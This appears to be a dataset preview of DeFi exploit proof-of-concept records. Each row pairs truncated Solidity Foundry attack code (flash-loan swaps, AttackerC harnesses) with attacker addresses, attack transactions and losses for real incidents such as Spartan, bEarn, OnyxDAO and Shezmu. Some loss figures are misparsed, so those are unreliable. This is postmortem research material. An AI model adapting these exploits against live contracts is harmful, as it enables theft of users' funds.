source_code stringlengths 878 31.2k | type stringclasses 1
value | protocol stringlengths 2 33 | date stringclasses 70
values | file_name stringlengths 10 41 | attack_vector stringclasses 4
values | content_hash stringlengths 16 16 | collected_at stringdate 2026-01-07 10:59:16 2026-01-07 10:59:16 | _source stringclasses 1
value | chain stringclasses 8
values | block_number int64 1.11M 356M ⌀ | total_lost_raw stringlengths 3 127 ⌀ | total_lost_usd float64 0 19,026B ⌀ | attacker_address stringlengths 65 82 ⌀ | attack_contract stringlengths 70 89 ⌀ | vulnerable_contract stringlengths 68 82 ⌀ | attack_tx stringlengths 89 115 ⌀ | postmortem_url stringclasses 85
values | twitter_url stringlengths 48 62 ⌀ | has_keyinfo bool 2
classes | has_analysis bool 2
classes | has_attack_vector bool 2
classes | severity stringclasses 4
values | severity_raw stringlengths 3 127 ⌀ | category stringclasses 5
values | exploit_code stringlengths 0 25.5k | has_exploit_code bool 2
classes | keyinfo_total_lost stringlengths 0 127 | keyinfo_attacker stringlengths 0 82 | keyinfo_attack_contract stringlengths 0 89 | keyinfo_vulnerable_contract stringlengths 0 82 | keyinfo_attack_tx stringlengths 0 115 | analysis_postmortem stringclasses 82
values | analysis_twitter stringlengths 0 62 | funds_lost_formatted stringlengths 2 13 | content_richness_score float64 0.63 10 | quality_estimate stringclasses 3
values | title stringlengths 20 51 | has_total_lost bool 2
classes | has_vulnerable_contract bool 2
classes | has_attack_tx bool 2
classes | has_postmortem bool 2
classes |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~ 95.5 K (1.14015390 WBTC)
// Original Attacker : 0xF6ffBa5cbF285824000daC0B9431032169672B6e
// MEV frontrunner : Yoink(0xFDe0d1575Ed8E06FBf36256bcdfA1F359281455A)
// Atta... | exploit_poc | Alkimiya_io | 2025-03 | Alkimiya_io_exp.sol | flash_loan | 833fdf55c15f2114 | 2026-01-07T10:59:16.532979 | postmortems | ethereum | 22,146,340 | ~ 95.5 K (1.14015390 WBTC) | 95,500 | null | https://etherscan.io/address/0x80bf7db69556d9521c03461978b8fc731dbbd4e4 | https://etherscan.io/address/0xf3f84ce038442ae4c4dcb6a8ca8bacd7f28c9bde | https://etherscan.io/tx/0x9b9a6dd05526a8a4b40e5e1a74a25df6ecccae6ee7bf045911ad89a1dd3f0814 | null | null | true | false | true | medium | ~ 95.5 K (1.14015390 WBTC) | flash-loan | function testPoC() public {
vm.startPrank(attacker);
AttackerC attC = new AttackerC();
attC.attack();
console2.log("Profit:", IFS(WBTC).balanceOf(address(attC)), 'WBTC');
}
}
contract AttackerC {
uint256 id; | true | ~ 95.5 K (1.14015390 WBTC) | https://etherscan.io/address/0x80bf7db69556d9521c03461978b8fc731dbbd4e4 | https://etherscan.io/address/0xf3f84ce038442ae4c4dcb6a8ca8bacd7f28c9bde | https://etherscan.io/tx/0x9b9a6dd05526a8a4b40e5e1a74a25df6ecccae6ee7bf045911ad89a1dd3f0814 | $95.5K | 9.08 | high | Alkimiya_io Exploit (2025-03) | true | true | true | false | |||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.17;
import "forge-std/Test.sol";
// @KeyInfo - Total Lost: $30.5M
// Attacker: 0x3b6e77722e2bbe97c1cfa337b42c0939aeb83671
// Attack Contract: 0x288315639c1145f523af6d7a5e4ccf8238cd6a51
// Vulnerable Contract: 0x3de669c4f1f167a8afbc9993e4753b84b576426f
// Att... | exploit_poc | Spartan | 2021-05 | Spartan_exp.sol | flash_loan | 7386f7bff4182bd1 | 2026-01-07T10:59:16.533030 | postmortems | unknown | 7,048,832 | $30.5M | 30,500,000 | null | null | null | https://explorer.phalcon.xyz/tx/bsc/0xb64ae25b0d836c25d115a9368319902c972a0215bd108ae17b1b9617dfb93af8?line=0 | null | null | true | false | true | critical | $30.5M | flash-loan | function testExploit() public {
CAKE_WBNB.swap(0, 100_000 ether, address(this), "flashloan 100k WBNB");
} | true | $30.5M | https://explorer.phalcon.xyz/tx/bsc/0xb64ae25b0d836c25d115a9368319902c972a0215bd108ae17b1b9617dfb93af8?line=0 | $30.50M | 8.53 | high | Spartan Exploit (2021-05) | true | false | true | false | |||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 1.5M
// Attacker : https://bscscan.com/address/0xc3bc29941677db01b9645f7b8b72d27e3ba75372
// Attack Contract : https://bscscan.com/address/0x7c591aab9429af81287951872595a17d5... | exploit_poc | JulSwap | 2021-05 | JulSwap_exp.sol | null | adebf2c42e8c56fd | 2026-01-07T10:59:16.533087 | postmortems | bsc | null | 1.5M | 1,500,000 | https://bscscan.com/address/0xc3bc29941677db01b9645f7b8b72d27e3ba75372 | https://bscscan.com/address/0x7c591aab9429af81287951872595a17d5837ce03 | https://bscscan.com/address/0x32dffc3fe8e3ef3571bf8a72c0d0015c5373f41d | https://bscscan.com/tx/0x1751268e620767ff117c5c280e9214389b7c1961c42e77fc704fd88e22f4f77a | null | null | true | true | false | critical | 1.5M | unknown | function testExploit() public balanceLog {
//implement exploit code here
uint256 amount0Out = 70_000_000_000_000_000_000_000;
uint256 amount1Out = 0;
IUniswapV2Pair(BSCswapPair).swap(amount0Out, amount1Out, address(this), "1");
} | true | 1.5M | https://bscscan.com/address/0xc3bc29941677db01b9645f7b8b72d27e3ba75372 | https://bscscan.com/address/0x7c591aab9429af81287951872595a17d5837ce03 | https://bscscan.com/address/0x32dffc3fe8e3ef3571bf8a72c0d0015c5373f41d | https://bscscan.com/tx/0x1751268e620767ff117c5c280e9214389b7c1961c42e77fc704fd88e22f4f77a | $1.50M | 7.61 | medium | JulSwap Exploit (2021-05) | true | true | true | false | ||
// SPDX-License-Identifier: UNLICENSED
pragma solidity >=0.7.0 <0.9.0;
import "forge-std/Test.sol";
import "./../interface.sol";
/**
* Exploit:
* Tx 1 : https://bscscan.com/tx/0x88fcffc3256faac76cde4bbd0df6ea3603b1438a5a0409b2e2b91e7c2ba3371a
* Attacker zaps 1 BNB into WBNB-USDT VaultFlipToFlip
*
* harvest()... | exploit_poc | PancakeBunny | 2021-05 | PancakeBunny_exp.sol | flash_loan | 17527a36b6a4efc3 | 2026-01-07T10:59:16.533141 | postmortems | bsc | 7,556,330 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
payable(WBNB).call{value: 1e18}("");
emit log_named_decimal_uint(
"Initial WBNB balance of attacker:", IERC20(WBNB).balanceOf(address(this)), IERC20(WBNB).decimals()
);
emit log_named_decimal_uint(
"Initial USDT balance of attacker... | true | Unknown | 6 | medium | PancakeBunny Exploit (2021-05) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 11M
// Attacker : https://bscscan.com/address/0x47f341d896b08daacb344d9021f955247e50d089
// Attack Contract : https://bscscan.com/address/0xef39f14213714001456e2e89eddbdf8c8... | exploit_poc | bEarn | 2021-05 | bEarn_exp.sol | flash_loan | 97e91b898243c028 | 2026-01-07T10:59:16.533241 | postmortems | bsc | null | 11M | 11,000,000 | https://bscscan.com/address/0x47f341d896b08daacb344d9021f955247e50d089 | https://bscscan.com/address/0xef39f14213714001456e2e89eddbdf8c850c3be6 | https://bscscan.com/address/0xb390b07fcf76678089cb12d8e615d5fe494b01fb | https://bscscan.com/tx/0x603b2bbe2a7d0877b22531735ff686a7caad866f6c0435c37b7b49e4bfd9a36c | https://bearndao.medium.com/bvaults-busd-alpaca-strategy-exploit-post-mortem-and-bearn-s-compensation-plan-b0b38c3b5540 | null | true | true | true | critical | 11M | flash-loan | function testExploit() public balanceLog {
//implement exploit code here
address receiver = address(this);
uint256 amount = ICreamFi(CreamFi).getCash();
ICreamFi(CreamFi).flashLoan(receiver, amount, "1");
} | true | 11M | https://bscscan.com/address/0x47f341d896b08daacb344d9021f955247e50d089 | https://bscscan.com/address/0xef39f14213714001456e2e89eddbdf8c850c3be6 | https://bscscan.com/address/0xb390b07fcf76678089cb12d8e615d5fe494b01fb | https://bscscan.com/tx/0x603b2bbe2a7d0877b22531735ff686a7caad866f6c0435c37b7b49e4bfd9a36c | https://bearndao.medium.com/bvaults-busd-alpaca-strategy-exploit-post-mortem-and-bearn-s-compensation-plan-b0b38c3b5540 | $11.00M | 8.21 | high | bEarn Exploit (2021-05) | true | true | true | true | |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.17;
import "forge-std/Test.sol";
// Attacker: 0x6c9f2b95ca3432e5ec5bcd9c19de0636a23a4994
// Attack Contract: 0xae0f538409063e66ff0e382113cb1a051fc069cd
// Objective: Drain funds in the vulnerable Burger LP contract: 0x7ac55ac530f2c29659573bde0700c6758d69e677... | exploit_poc | BurgerSwap | 2021-05 | BurgerSwap_exp.sol | flash_loan | 49e19e7f6d6dbc56 | 2026-01-07T10:59:16.533285 | postmortems | bsc | 7,781,159 | null | null | null | null | null | https://phalcon.xyz/tx/bsc/0xac8a739c1f668b13d065d56a03c37a686e0aa1c9339e79fcbc5a2d0a6311e333 | null | null | false | false | true | medium | null | flash-loan | function testExploit() public {
// BURGER and WBNB in Pair before: 164603 <> 3038
USDT_WBNB.swap(0, 6_047_132_230_250_298_663_393, address(this), "Flashloan 6047 WBNB");
// BURGER and WBNB in Pair after: 53606 <> 622
console.log("BURGER exploited:", BURGER.balanceOf(address(this)) / 1e1... | true | https://phalcon.xyz/tx/bsc/0xac8a739c1f668b13d065d56a03c37a686e0aa1c9339e79fcbc5a2d0a6311e333 | Unknown | 8 | high | BurgerSwap Exploit (2021-05) | false | false | true | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
Attack tx: https://etherscan.com/tx/0x171072422efb5cd461546bfe986017d9b5aa427ff1c07ebe8acc064b13a7b7be
Tenderly.co: https://dashboard.tenderly.co/tx/mainnet/0x171072422efb5cd461546bfe986... | exploit_poc | RariCapital | 2021-05 | RariCapital_exp.sol | null | 83f41b9e9c1e7629 | 2026-01-07T10:59:16.533349 | postmortems | unknown | 12,394,009 | null | null | null | null | null | https://etherscan.com/tx/0x171072422efb5cd461546bfe986017d9b5aa427ff1c07ebe8acc064b13a7b7be | null | null | false | false | false | medium | null | unknown | function testExploit() public {
emit log_named_decimal_uint("[Start] ETH Balance of attacker", attacker.balance, 18);
bytes memory data =
hex"00000000000000000000000081796c4602b82054a727527cd16119807b8c76080000000000000000000000000000000000000000000000000000000000000040000000000000000000000... | true | Unknown | 4.15 | low | RariCapital Exploit (2021-05) | false | false | true | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
/*
Attack tx: https://bscscan.com/tx/0xa00def91954ba9f1a1320ef582420d41ca886d417d996362bf3ac3fe2bfb9006
Tenderly.co: https://dashboard.tenderly.co/tx/bsc/0xa00def91954ba9f1a1320ef582420d41c... | exploit_poc | ValueDefi | 2021-05 | ValueDefi_exp.sol | null | a2010785f7605cf5 | 2026-01-07T10:59:16.533393 | postmortems | bsc | 7,223,029 | null | null | null | null | null | https://bscscan.com/tx/0xa00def91954ba9f1a1320ef582420d41ca886d417d996362bf3ac3fe2bfb9006 | null | null | false | false | false | medium | null | unknown | function testExploit() public {
emit log_named_decimal_uint("[Start] WBNB Balance of attacker", wbnb.balanceOf(attacker), 18);
bytes memory data =
hex"000000000000000000000000e38ebfe8f314dcad61d5adcb29c1a26f41bed0be0000000000000000000000000000000000000000000000000000000000000040000000000000... | true | Unknown | 4.33 | low | ValueDefi Exploit (2021-05) | false | false | true | false | |||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 400k USD
// Attacker : https://etherscan.io/address/0x67404bcd629E920100c594d62f3678340F40D95a
// Attack Contract : https://etherscan.io/address/0xbe01c53AD466Ef011e3f8A67F6e23C34E2e9976C
// Vulnerable Contract... | exploit_poc | PLN | 2024-09 | PLN_exp.sol | null | 5531d8c6ec4fdda5 | 2026-01-07T10:59:16.533445 | postmortems | ethereum | 20,681,142 | 400k USD | 400,000 | https://etherscan.io/address/0x67404bcd629E920100c594d62f3678340F40D95a | https://etherscan.io/address/0xbe01c53AD466Ef011e3f8A67F6e23C34E2e9976C | https://etherscan.io/address/0xe0c218e1633a5c76d57ff4f11149f07bfff16aea | https://etherscan.io/tx/0xcc36283cee837a8a0d4af0357d1957dc561913e44ad293ea9da8acf15d874ed5 | https://x.com/TenArmorAlert/status/1831525062253654300 | https://x.com/TenArmorAlert/status/1831525062253654300 | true | true | false | high | 400k USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
attC.attack{value: 0.9 ether}();
vm.stopPrank();
emit log_named_decimal_uint(... | true | 400k USD | https://etherscan.io/address/0x67404bcd629E920100c594d62f3678340F40D95a | https://etherscan.io/address/0xbe01c53AD466Ef011e3f8A67F6e23C34E2e9976C | https://etherscan.io/address/0xe0c218e1633a5c76d57ff4f11149f07bfff16aea | https://etherscan.io/tx/0xcc36283cee837a8a0d4af0357d1957dc561913e44ad293ea9da8acf15d874ed5 | https://x.com/TenArmorAlert/status/1831525062253654300 | https://x.com/TenArmorAlert/status/1831525062253654300 | $400.0K | 8.04 | high | PLN Exploit (2024-09) | true | true | true | true |
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~8.8 WBNB
// Attacker : 0x3026c464d3bd6ef0ced0d49e80f171b58176ce32
// Attack Contract : 0x1c4684b838cf4344c152ba18650d1524af4f0f12
// Vulnerable Contract : 0xc6a8c02dd5a3dd1616ec072bfc7c9d3df9682a63
// Attack Tx : https://bscscan.com/tx... | exploit_poc | MARA | 2024-09 | MARA_exp.sol | flash_loan | 85f51227c4c7a8dd | 2026-01-07T10:59:16.533494 | postmortems | bsc | 42,538,916 | ~8.8 WBNB | 8.8 | null | null | null | https://bscscan.com/tx/0x0fe3716431f8c2e43217c3ca6d25eed87e14d0fbfa9c9ee8ce4cef2e5ec4583c | null | null | true | false | true | low | ~8.8 WBNB | flash-loan | false | ~8.8 WBNB | https://bscscan.com/tx/0x0fe3716431f8c2e43217c3ca6d25eed87e14d0fbfa9c9ee8ce4cef2e5ec4583c | $9 | 5.53 | medium | MARA Exploit (2024-09) | true | false | true | false | ||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 7K USD
// Attacker : https://etherscan.io/address/0x7248939f65bdd23aab9eaab1bc4a4f909567486e
// Attack Contract : https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1
// Vulnerable Contract :... | exploit_poc | DOGGO | 2024-09 | DOGGO_exp.sol | null | 02122a120f36d5b4 | 2026-01-07T10:59:16.533552 | postmortems | ethereum | 20,794,802 | 7K USD | 7,000 | https://etherscan.io/address/0x7248939f65bdd23aab9eaab1bc4a4f909567486e | https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1 | https://etherscan.io/address/0x240cd7b53d364a208ed41f8ced4965d11f571b7a | https://app.blocksec.com/explorer/tx/eth/0x9e074d70e4f9022cba33c1417a6f6338d8248b67d6141c9a32913ca567d0efca?line=0 | https://x.com/TenArmorAlert/status/1837358462076080521 | https://x.com/TenArmorAlert/status/1837358462076080521 | true | true | false | low | 7K USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
deal(address(attC), 3.78e-16 ether);
attC.attack{value: 3.78e-16 ether}();
vm... | true | 7K USD | https://etherscan.io/address/0x7248939f65bdd23aab9eaab1bc4a4f909567486e | https://etherscan.io/address/0xbdb0bc0941ba81672593cd8b3f9281789f2754d1 | https://etherscan.io/address/0x240cd7b53d364a208ed41f8ced4965d11f571b7a | https://app.blocksec.com/explorer/tx/eth/0x9e074d70e4f9022cba33c1417a6f6338d8248b67d6141c9a32913ca567d0efca?line=0 | https://x.com/TenArmorAlert/status/1837358462076080521 | https://x.com/TenArmorAlert/status/1837358462076080521 | $7.0K | 9 | high | DOGGO Exploit (2024-09) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~1.4M USD
// Attacker : 0x5766d1F03378f50c7c981c014Ed5e5A8124f38A4
// Attack Contract : 0x87EFb39a716860eCd2324A944Cb40EC5128e56Dd, 0xD9ad954Bea4ad65578904CEFE6Ee2A6EB13... | exploit_poc | Caterpillar_Coin_CUT | 2024-09 | Caterpillar_Coin_CUT_exp.sol | null | a965c43ab4a6ef0e | 2026-01-07T10:59:16.533619 | postmortems | bsc | 42,131,697 | ~1.4M USD | 1,400,000 | null | null | null | null | null | null | true | true | false | critical | ~1.4M USD | unknown | false | ~1.4M USD | $1.40M | 4.68 | low | Caterpillar_Coin_CUT Exploit (2024-09) | true | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
/*
// @KeyInfo - Total Lost : 26k US$
// Attacker : 0x000000003704BC4ffb86000046721f44Ef3DBABe
// Attack Contract : 0xd11eE5A6a9EbD9327360D7A82e40d2F8C314e985
// Vulnerable Contract : 0xF2c8e860ca12... | exploit_poc | OTSeaStaking | 2024-09 | OTSeaStaking_exp.sol | null | 2e94e955d1778271 | 2026-01-07T10:59:16.533680 | postmortems | ethereum | null | 26k US$ | 26,000 | null | null | null | null | null | null | true | true | false | medium | 26k US$ | unknown | function testExploit() public {
OTSeaRevenueDistributor(otseaDist).distribute();
vm.startPrank(attackContract);
for (uint256 i = 0; i < 14; i++) {
uint256[] memory indexes = new uint256[](21);
for (uint256 j = 0; j < 20; j++) {
indexes[j] = j;
... | true | 26k US$ | $26.0K | 5.99 | medium | OTSeaStaking Exploit (2024-09) | true | false | false | false | ||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @POC Author : [rotcivegaf](https://twitter.com/rotcivegaf)
// Contrasts involved
address constant agETH = 0xe1B4d34E8754600962Cd944B535180Bd758E6c2e;
address constant balancerVault = 0xBA1222222... | exploit_poc | Penpiexyzio | 2024-09 | Penpiexyzio_exp.sol | flash_loan | 06064918b9e1a99e | 2026-01-07T10:59:16.533744 | postmortems | unknown | 20,671,878 | null | null | null | null | null | null | null | null | false | false | true | medium | null | flash-loan | function testPoC_A() public {
attacker = new Attacker();
// First tx: 0x7e7f9548f301d3dd863eac94e6190cb742ab6aa9d7730549ff743bf84cbd21d1
attacker.createMarket();
// To pass `if (lastRewardBlock != block.number) {` of PendleMarketV3 contract
vm.roll(block.number + 1);
/... | true | Unknown | 6 | medium | Penpiexyzio Exploit (2024-09) | false | false | false | false | |||||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 4.1M VUSD, 7.35M XCN, 5K DAI, 0.23 WBTC, 50K USDT (>$3.8M USD)
// Attacker : https://etherscan.io/address/0x680910cf5fc9969a25fd57e7896a14ff1e55f36b
// Attack Contract :
/... | exploit_poc | OnyxDAO | 2024-09 | OnyxDAO_exp.sol | flash_loan | d9606c3984a4206f | 2026-01-07T10:59:16.533847 | postmortems | ethereum | 20,834,658 | 4.1M VUSD, 7.35M XCN, 5K DAI, 0.23 WBTC, 50K USDT (>$3.8M USD) | 4,100,000 | https://etherscan.io/address/0x680910cf5fc9969a25fd57e7896a14ff1e55f36b | null | null | https://etherscan.io/tx/0x46567c731c4f4f7e27c4ce591f0aebdeb2d9ae1038237a0134de7b13e63d8729 | null | null | true | false | true | critical | 4.1M VUSD, 7.35M XCN, 5K DAI, 0.23 WBTC, 50K USDT (>$3.8M USD) | flash-loan | function testPoC() public {
vm.startPrank(attacker);
AttackerC attackerC = new AttackerC();
// tx:
attackerC.attack();
console.log("Final balance in VUSD :", IERC20(VUSD).balanceOf(address(attacker)));
console.log("Final balance in XCN:", IERC20(XCN).balanceOf(address(a... | true | 4.1M VUSD, 7.35M XCN, 5K DAI, 0.23 WBTC, 50K USDT (>$3.8M USD) | https://etherscan.io/address/0x680910cf5fc9969a25fd57e7896a14ff1e55f36b | https://etherscan.io/tx/0x46567c731c4f4f7e27c4ce591f0aebdeb2d9ae1038237a0134de7b13e63d8729 | $4.10M | 9 | high | OnyxDAO Exploit (2024-09) | true | false | true | false | ||||
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./../interface.sol";
// @KeyInfo - Total Lost : ~404 WBNB
// Attacker : 0x4645863205b47a0a3344684489e8c446a437d66c
// Attack Contract : 0x8f921e27e3af106015d1c3a244ec4f48dbfcad14
// Vulnerable Contract : 0x564d4126af2... | exploit_poc | Bankroll | 2024-09 | Bankroll_exp.sol | null | 1b331f126bbe735b | 2026-01-07T10:59:16.533930 | postmortems | bsc | 42,481,611 | ~404 WBNB | 404 | null | null | null | null | null | null | true | true | false | low | ~404 WBNB | unknown | false | ~404 WBNB | $404 | 3.48 | low | Bankroll Exploit (2024-09) | true | false | false | false | |||||||
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 11,000 USD
// Attacker : https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd
// Attack Contract : https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd
// Vulnerable Contra... | exploit_poc | INUMI | 2024-09 | INUMI_exp.sol | null | 022b84787d2f57c9 | 2026-01-07T10:59:16.533976 | postmortems | ethereum | 20,729,548 | 11,000 USD | 11 | https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd | https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd | https://etherscan.io/address/0xdb27d4ff4be1cd04c34a7cb6f47402c37cb73459 | https://etherscan.io/tx/0xbeef352f716973043236f73dd5104b9d905fd04b7fc58d9958ac5462e7e3dbc1 | https://x.com/TenArmorAlert/status/1834504921561100606 | https://x.com/TenArmorAlert/status/1834504921561100606 | true | true | false | low | 11,000 USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
deal(address(attC), 5.000000000000028 ether);
attC.attack{value: 1.07297e-13 ether}()... | true | 11,000 USD | https://etherscan.io/address/0xd215ffaf0f85fb6f93f11e49bd6175ad58af0dfd | https://etherscan.io/address/0xd129d8c12f0e7aa51157d9e6cc3f7ece2dc84ecd | https://etherscan.io/address/0xdb27d4ff4be1cd04c34a7cb6f47402c37cb73459 | https://etherscan.io/tx/0xbeef352f716973043236f73dd5104b9d905fd04b7fc58d9958ac5462e7e3dbc1 | https://x.com/TenArmorAlert/status/1834504921561100606 | https://x.com/TenArmorAlert/status/1834504921561100606 | $11 | 7.02 | medium | INUMI Exploit (2024-09) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.15;
import "../basetest.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 4.9M USD
// Attacker : https://etherscan.io/address/0xa3a64255484ad65158af0f9d96b5577f79901a1d
// Attack Contract : https://etherscan.io/address/0xEd4B3d468DEd53a322A8B8280B6... | exploit_poc | Shezmu | 2024-09 | Shezmu_exp.sol | access_control | 9dbc105d0975497c | 2026-01-07T10:59:16.534023 | postmortems | ethereum | null | 4.9M USD | 4,900,000 | https://etherscan.io/address/0xa3a64255484ad65158af0f9d96b5577f79901a1d | https://etherscan.io/address/0xEd4B3d468DEd53a322A8B8280B6f35aAE8bC499C | https://etherscan.io/address/0x641249dB01d5C9a04d1A223765fFd15f95167924 | https://etherscan.io/tx/0x39328ea4377a8887d3f6ce91b2f4c6b19a851e2fc5163e2f83bbc2fc136d0c71 | https://medium.com/coinmonks/decoding-shezmus-4-9-million-exploit-10dc0266b25b | https://x.com/shoucccc/status/1837228053862437244 | true | true | true | critical | 4.9M USD | access-control | function testExploit() public balanceLog {
//implement exploit code here
AttackContract attackContract = new AttackContract();
attackContract.attack();
}
}
contract AttackContract {
address attacker;
constructor() {
attacker = msg.sender;
} | true | 4.9M USD | https://etherscan.io/address/0xa3a64255484ad65158af0f9d96b5577f79901a1d | https://etherscan.io/address/0xEd4B3d468DEd53a322A8B8280B6f35aAE8bC499C | https://etherscan.io/address/0x641249dB01d5C9a04d1A223765fFd15f95167924 | https://etherscan.io/tx/0x39328ea4377a8887d3f6ce91b2f4c6b19a851e2fc5163e2f83bbc2fc136d0c71 | https://medium.com/coinmonks/decoding-shezmus-4-9-million-exploit-10dc0266b25b | https://x.com/shoucccc/status/1837228053862437244 | $4.90M | 8.44 | high | Shezmu Exploit (2024-09) | true | true | true | true |
// @KeyInfo - Total Lost : 110,000 USD
// Attacker : https://bscscan.com/address/0x57ecf40b596274a985967e3f698437ae0a9600a0
// Attack Contract : https://bscscan.com/address/0x11bffb96daa9b0c47fef01401eb089549e87604e
// Vulnerable Contract : https://bscscan.com/address/0x05c2dd9cf547c6cccf91245346e6e1bc9926cae7
// Atta... | exploit_poc | WXETA | 2024-09 | WXETA_exp.sol | null | 490978270fa586a4 | 2026-01-07T10:59:16.534073 | postmortems | bsc | 42,284,161 | 110,000 USD | 110 | https://bscscan.com/address/0x57ecf40b596274a985967e3f698437ae0a9600a0 | https://bscscan.com/address/0x11bffb96daa9b0c47fef01401eb089549e87604e | https://bscscan.com/address/0x05c2dd9cf547c6cccf91245346e6e1bc9926cae7 | https://bscscan.com/tx/0x614da880bd46e98131accd9a83917abf3d56dac94caf13ae98eeff504eea3704 | https://x.com/TenArmorAlert/status/1835494807495659645 | https://x.com/TenArmorAlert/status/1835494807495659645 | true | true | false | low | 110,000 USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
vm.stopPrank();
emit log_named_decimal_uint("after attack: balance of attacker", addr... | true | 110,000 USD | https://bscscan.com/address/0x57ecf40b596274a985967e3f698437ae0a9600a0 | https://bscscan.com/address/0x11bffb96daa9b0c47fef01401eb089549e87604e | https://bscscan.com/address/0x05c2dd9cf547c6cccf91245346e6e1bc9926cae7 | https://bscscan.com/tx/0x614da880bd46e98131accd9a83917abf3d56dac94caf13ae98eeff504eea3704 | https://x.com/TenArmorAlert/status/1835494807495659645 | https://x.com/TenArmorAlert/status/1835494807495659645 | $110 | 7.63 | medium | WXETA Exploit (2024-09) | true | true | true | true |
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : 100 USD
// Attacker : https://bscscan.com/address/0xba35d089addac99a8e7bcd1a25712b1702623ae3
// Attack Contract : https://bscscan.com/address/0xd310431e98412eb9a7c66808478bf08fdea81e2a
// Vulnerable Contract : ... | exploit_poc | unverified_766a | 2024-09 | unverified_766a_exp.sol | null | eb16b25a5749d71b | 2026-01-07T10:59:16.534123 | postmortems | bsc | 42,357,807 | 100 USD | 100 | https://bscscan.com/address/0xba35d089addac99a8e7bcd1a25712b1702623ae3 | https://bscscan.com/address/0xd310431e98412eb9a7c66808478bf08fdea81e2a | https://bscscan.com/address/0x766a0936ff0ad045d39871846194edbd5df63a58 | https://app.blocksec.com/explorer/tx/bsc/0x73d459ad3c926f5247a2018197d13b2a0acbc1fc46e1e54525c210a46130a56b | https://x.com/TenArmorAlert/status/1836339028616188321 | https://x.com/TenArmorAlert/status/1836339028616188321 | true | true | false | low | 100 USD | unknown | function testPoC() public {
emit log_named_decimal_uint("before attack: balance of attacker", address(attacker).balance, 18);
vm.startPrank(attacker, attacker);
AttackerC attC = new AttackerC();
attC.attack{value: 3.52e-15 ether}();
vm.stopPrank();
emit log_named_decimal_... | true | 100 USD | https://bscscan.com/address/0xba35d089addac99a8e7bcd1a25712b1702623ae3 | https://bscscan.com/address/0xd310431e98412eb9a7c66808478bf08fdea81e2a | https://bscscan.com/address/0x766a0936ff0ad045d39871846194edbd5df63a58 | https://app.blocksec.com/explorer/tx/bsc/0x73d459ad3c926f5247a2018197d13b2a0acbc1fc46e1e54525c210a46130a56b | https://x.com/TenArmorAlert/status/1836339028616188321 | https://x.com/TenArmorAlert/status/1836339028616188321 | $100 | 7.47 | medium | unverified_766a Exploit (2024-09) | true | true | true | true |
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import "forge-std/Test.sol";
import "../interface.sol";
// @KeyInfo - Total Lost : ~1.7M US$
// Attacker : https://etherscan.io/address/0x2bFB373017349820dda2Da8230E6b66739BE9F96
